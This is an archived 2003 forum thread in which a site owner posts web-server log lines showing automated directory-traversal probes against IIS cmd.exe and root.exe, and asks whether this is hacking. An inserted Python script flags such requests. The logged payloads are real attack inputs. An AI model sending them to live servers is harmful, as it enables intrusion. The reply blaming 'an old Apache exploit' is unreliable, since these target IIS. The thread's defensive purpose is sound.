	
	
		| Author | Message | 
	
		| CANCERMAN Guest
 
 
 
 
 
 
 | 
			
				|  Posted: Sun Jan 26, 2003 12:59 pm    Post subject: More hacking or/ RE: why i ask |   |  
				| 
 |  
				| I see that other people have a problem that reminds me of mine, but their access.log file does not look like mine. Some parts are alike, but some parts are not like other people's log files:
 
 213.113.110.16 - - [26/Jan/2003:02:21:01 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
 213.113.110.16 - - [26/Jan/2003:02:21:01 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
 213.113.110.16 - - [26/Jan/2003:02:21:01 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
 213.113.110.16 - - [26/Jan/2003:02:21:01 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
 213.113.110.16 - - [26/Jan/2003:02:21:01 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.73.214.209 - - [26/Jan/2003:07:07:32 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
 213.73.214.209 - - [26/Jan/2003:07:07:32 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
 213.73.214.209 - - [26/Jan/2003:07:07:33 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
 213.73.214.209 - - [26/Jan/2003:07:07:33 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
 213.73.214.209 - - [26/Jan/2003:07:07:33 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.73.214.209 - - [26/Jan/2003:07:07:33 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.73.214.209 - - [26/Jan/2003:07:07:34 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.73.214.209 - - [26/Jan/2003:07:07:34 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.73.214.209 - - [26/Jan/2003:07:07:34 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.73.214.209 - - [26/Jan/2003:07:07:34 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.73.214.209 - - [26/Jan/2003:07:07:35 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.73.214.209 - - [26/Jan/2003:07:07:38 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.73.214.209 - - [26/Jan/2003:07:07:38 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 213.73.214.209 - - [26/Jan/2003:07:07:39 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
 62.160.179.5 - - [26/Jan/2003:08:57:22 +0100] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 400 429
 
 Is this a hacking thing too...?
 |  | 
	
	
		|  | 
	
		| Bluedog -
 
 
 Joined: 05 Jan 2003
 Posts: 179
 
 
 | 
			
				|  Posted: Sun Jan 26, 2003 8:25 pm    Post subject: |   |  
				| 
 |  
				| Yes, this is caused by scripts such as Code Red trying (and failing) to use an old Apache exploit to gain access to your PC. |  | 
	
	
		|  | 
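A sketch of how the requests in the log posted above can be recognised and tallied per client, added here as an example (not code from any poster in this thread): each path is percent-decoded repeatedly and overlong two-byte sequences such as `%c0%af` are folded to ASCII before checking for `../` and for `cmd.exe` or `root.exe`. The function names and the last sample line are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Four lines taken from the log posted above, plus one constructed benign request.
SAMPLE = """\
213.113.110.16 - - [26/Jan/2003:02:21:01 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
213.113.110.16 - - [26/Jan/2003:02:21:01 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:35 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
62.160.179.5 - - [26/Jan/2003:08:57:22 +0100] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 400 429
192.0.2.10 - - [26/Jan/2003:09:00:00 +0100] "GET /index.html HTTP/1.0" 200 1043
"""
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) ([^\s"]+)[^"]*" (\d{3}) ')

def normalise(path, rounds=3):
    """Percent-decode repeatedly, fold overlong pairs, unify slashes and case."""
    raw = path.encode("utf-8")
    for _ in range(rounds):  # %255c -> %5c -> backslash
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    # Fold C0/C1-led pairs the way a lax UTF-8 decoder would (%c0%af -> /).
    fold = lambda m: bytes([((m[0][0] & 0x1F) << 6) | (m[0][1] & 0x3F)])
    raw = re.sub(rb"[\xc0\xc1].", fold, raw, flags=re.S)
    return raw.decode("latin-1").replace("\\", "/").lower()

def classify(target):
    """Return the tags that apply to one request target."""
    path = normalise(target.split("?", 1)[0])
    tags = []
    if "../" in path:
        tags.append("traversal")
    if re.search(r"/(cmd|root)\.exe$", path):
        tags.append("windows-shell")
    return tags

def summarise(log_text):
    """Map client IP -> counts of flagged requests and of those answered 2xx."""
    report = defaultdict(lambda: {"probes": 0, "served": 0})
    for m in filter(None, map(LINE.match, log_text.splitlines())):
        ip, _method, target, status = m.groups()
        if classify(target):
            report[ip]["probes"] += 1
            report[ip]["served"] += status.startswith("2")  # 2xx needs follow-up
    return dict(report)

if __name__ == "__main__":
    print(summarise(SAMPLE))
```

A `served` count of zero, as here, means every flagged request was refused with a 4xx status; any non-zero value is the case to investigate.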
	
		| Illuminator Guest
 
 
 
 
 
 
 | 
			
				|  Posted: Tue Jan 28, 2003 5:38 am    Post subject: More hacking or/ RE: why i ask |   |  
				| 
 |  
				| I suppose the next logical question would be - is it possible that one can configure the server to block specific IP addresses, or should this be done via a firewall? 
 Thanks.
 |  | 
	
	
		|  | 
	
		| Illuminator -
 
 
 Joined: 28 Jan 2003
 Posts: 1
 
 
 | 
			
				|  Posted: Tue Jan 28, 2003 5:51 am    Post subject: |   |  
				| 
 |  
				| Never mind... I will examine some other avenues of blocking the IP involved.
 I actually read the other posts to understand that the server itself does not yet allow the capability of blocking IPs.
 
 Thanks.
 |  | 
	
	
		|  | 
	
		|  |